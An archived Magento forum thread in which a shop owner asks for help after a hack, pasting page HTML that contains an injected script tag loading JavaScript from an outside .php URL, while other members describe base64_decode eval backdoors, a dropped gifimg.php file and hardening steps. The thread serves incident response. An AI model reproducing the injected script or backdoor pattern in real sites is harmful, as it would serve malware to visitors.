Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

URGENT - SITE HACKED, Google Warning, PLEASE HELP!!! 
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

My site got hacked again, but this time Google warns customers that my site be giving out malware.

i found where these russian hackers inserted the text on a sitemap.html file

but i think that was just to fool me…

here is the code: I don’t know what file they altered.

the website is:

http://ezgmp.com/events/ezGXP-FDA-News.php

<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/reset.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/boxes.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/menu.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/clears.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/print.css" media="print" />
<!--
[if IE]>
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/iestyles.css" media="all" />
<!
[endif]-->
<!--
[if lt IE 7]>
<
script type="text/javascript" src="http://www.domain.com/js/index.php?c=auto&amp;f=,lib/ds-sleight.js,varien/iehover-fix.js" ></script>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/ie7minus.css" media="all" />
<!
[endif]-->
<
script type="text/javascript">var Translator = new Translate([]);</script></head><script src=http://ezgmp.com/events/ezGXP-FDA-News.php ></script>
 
<body class=" cms-page-view cms-home">
    <
div class="no-display">

I think these hackers know my ftp password, because I changed the file permissions to 444, but when I checked this morning they had the files to “write” again.

> I use FileZilla to upload files.
> I’ve scanned my computer of viruses and malwarebytes - NOTHING
> changed my passwords

I have a question:

what should my file permissions for files and folders be? 444 or 555? or diffferent files/folders different things.

because i made skin folder 444 and then my site stopped working all together.

the admin section doesn’t work either. i can’t access any of the sub menu items

 
Magento Community Magento Community
Magento Community
Magento Community
 
Vincèn
Sr. Member
 
Avatar
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 

Well if they know your ftp password, first thing is to change it to a very good one as it’s first step in security. Now you need to reinstall in a new separate hosting account a clean Magento and transfer in it your data as once your store has been compromised you can never be sure you cleaned it completely !
Had you used some efficient login/pass for your admin backoffice, ftp and mysql accounts ?

Vincèn

 
Magento Community Magento Community
Magento Community
Magento Community
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

all my passwords were complicated using upper case, number and characters.

i’ve been through (what seems) every single index.php file, or any text file in my directory.

i got stuff out where i thought wouldnt even exist, but it was there.

i can\t find where they hid this script its VERY FRUSTRATING!

where could it it… between <head> and <bodyy> tags.????

PLEASE HELP!

 
Magento Community Magento Community
Magento Community
Magento Community
 
Vincèn
Sr. Member
 
Avatar
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 
express33 - 15 November 2009 09:31 PM

all my passwords were complicated using upper case, number and characters.
i’ve been through (what seems) every single index.php file, or any text file in my directory.
i got stuff out where i thought wouldnt even exist, but it was there.
i can\t find where they hid this script its VERY FRUSTRATING!

As I told you previously, only way to recover from such things is to reinstall from scratch magento and rebuild it as you can never be sure to have removed everything they made :( Were you up-to-date with Magento version ?

Vincèn

 
Magento Community Magento Community
Magento Community
Magento Community
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

My site was hacked the same way.

Make sure to search your entire account for the phrase base64_decode

remove all strange code containing that phrase. (code that starts with: {?php eval(base64_decode.............)

You will find they created some files as well Look at image folders for a file called: gifimg.php and remove them

Never use ftp use only sftp. When you use ftp your password is open to public in plain text.

Good luck.

 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Also, never store the password in the FTP client. Always type it in every time you need it. It only takes an exploited ftp client to have your server compromised if the password is stored.

 
Magento Community Magento Community
Magento Community
Magento Community
 
johnlouis
Sr. Member
 
Avatar
Total Posts:  92
Joined:  2008-08-27
 

Thanks a lot jonas.It saved me a lot .My magento site also was hacked .I found base64_decode in downloader/index.php,includes/config.php & media/cron.php.Once maore thank you very much

 
Magento Community Magento Community
Magento Community
Magento Community
 
Turnkeye
Enthusiast
 
Avatar
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

It was a trojan program I suppose, install fresh antivirus software on all machines.

Also make sure that you use secure hosting, and it is not possible to view the folder outside your account via exec cd .. commands or view other clients or accounts using cat /etc/passwd

 
Magento Community Magento Community
Magento Community
Magento Community
 
Turnkeye
Enthusiast
 
Avatar
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

Here is how to report to google that your site is clean:

http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html

 
Magento Community Magento Community
Magento Community
Magento Community
 
johnlouis
Sr. Member
 
Avatar
Total Posts:  92
Joined:  2008-08-27
 

Thanks a lot @Turnkey I am onto it

 
Magento Community Magento Community
Magento Community
Magento Community
 
WebhostUK LTD
Sr. Member
 
Avatar
Total Posts:  163
Joined:  2009-08-27
UK
 
express33 - 15 November 2009 09:31 PM

all my passwords were complicated using upper case, number and characters.

i’ve been through (what seems) every single index.php file, or any text file in my directory.

i got stuff out where i thought wouldnt even exist, but it was there.

i can\t find where they hid this script its VERY FRUSTRATING!

where could it it… between <head> and <bodyy> tags.????

PLEASE HELP!

Install suphp on your server this will make sure folder permission is 755 and files permission is 644 , always files or folder with 777 permission are easy way for hacker.
Suphp will also takecare and not allow nobody files, its much safer to do so to prevent such activities.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Turnkeye
Enthusiast
 
Avatar
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 
Turnkeye.com - 27 February 2010 11:13 AM

Here is how to report to google that your site is clean:

http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html

Feel free to contact us if you will need any help

 
Magento Community Magento Community
Magento Community
Magento Community
 
Nautica
Sr. Member
 
Avatar
Total Posts:  140
Joined:  2008-01-03
 
johnlouis - 10 February 2010 01:16 AM

Thanks a lot jonas.It saved me a lot .My magento site also was hacked .I found base64_decode in downloader/index.php,includes/config.php & media/cron.php.Once maore thank you very much

Should there be a cron.php in the Media folder??? I don’t have it in my install

And never use Filezilla. I also experienced stolen passwords before with filezilla. You must have had a trojan that stole passwords from filezilla. (running illegal software with a crack grin )

I still experience login attempts with the old passwords and loginnames in the logs. ( of course they are all changed) Most attempts originate in China.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top